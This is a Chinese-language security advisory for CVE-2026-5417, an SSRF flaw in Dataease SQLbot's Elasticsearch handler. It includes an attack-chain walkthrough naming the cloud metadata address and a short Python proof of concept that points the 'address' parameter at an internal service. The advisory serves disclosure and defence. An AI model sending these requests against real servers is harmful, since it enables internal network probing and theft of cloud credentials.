IPBUF安全漏洞报告
English
CVE-2026-5417 CVSS 4.7 中危

CVE-2026-5417 Dataease SQLbot Elasticsearch组件SSRF漏洞

披露日期: 2026-04-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5417
漏洞类型
服务器端请求伪造 (SSRF)
CVSS评分
4.7 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Dataease SQLbot

相关标签

SSRFServer-Side Request ForgeryDataease SQLbotElasticsearchCWE-918CVE-2026-5417

漏洞概述

Dataease SQLbot是一款数据处理工具,在1.6.0及之前的版本中存在安全漏洞。该漏洞位于Elasticsearch处理组件的文件backend/apps/db/es_engine.py中,具体影响get_es_data_by_http函数。由于该函数未对用户输入的address参数进行充分验证,导致远程攻击者可诱导服务器向任意地址发起请求,即服务器端请求伪造(SSRF)。成功利用此漏洞可能导致信息泄露,建议尽快升级至安全版本。

技术细节

该漏洞源于Dataease SQLbot后端在处理Elasticsearch连接请求时缺乏严格的输入校验。具体受影响代码位于backend/apps/db/es_engine.py文件的get_es_data_by_http函数中。该函数旨在通过HTTP获取Elasticsearch数据,但在实现过程中,直接将用户可控的address参数作为目标URL进行请求,未对其进行格式合法性检查或白名单限制。攻击者一旦拥有高权限账户(PR:H),即可构造恶意请求,将address参数指向内网敏感资源(如本地回环地址127.0.0.1、云元数据服务169.254.169.254或其他内部端口)。服务器会代为发送请求并返回响应,从而使攻击者能够探测内网拓扑或获取敏感数据。攻击过程无需用户交互,具有较低的利用复杂度。

攻击链分析

STEP 1
1. 权限获取
攻击者首先需要获取Dataease SQLbot的高权限账户访问权限(CVSS向量要求PR:H),以便能够调用受影响的API接口。
STEP 2
2. 漏洞利用
攻击者向受影响端点发送特制的HTTP请求,在参数address中填入内网地址(如http://169.254.169.254/latest/meta-data/),触发get_es_data_by_http函数。
STEP 3
3. 请求伪造
服务器端应用解析请求,未过滤address参数,直接向攻击者指定的内网地址发起HTTP连接。
STEP 4
4. 信息回显
内网服务响应请求,服务器将响应内容返回给攻击者,导致内网信息泄露或服务指纹识别。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example, replace with actual endpoint) target_url = "http://target-vulnerable-server:port/api/db/es_data" # The vulnerable parameter is 'address'. # An attacker can change this to an internal IP address to scan the internal network. payload = { "address": "http://127.0.0.1:22", # Internal service to probe "query": "*" } try: # Sending the request to trigger the SSRF response = requests.post(target_url, json=payload, timeout=10) if response.status_code == 200: print("[+] Potential SSRF triggered!") print("Response headers:", response.headers) print("Response body:", response.text[:200]) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

影响范围

Dataease SQLbot <= 1.6.0

防御指南

临时缓解措施
如果无法立即升级,建议在网络防火墙或安全组层面阻断服务器对非业务必要IP(如127.0.0.1、169.254.169.254等)的访问。同时,严格限制高权限账户的使用范围,监控API请求日志中是否存在异常的内网访问请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表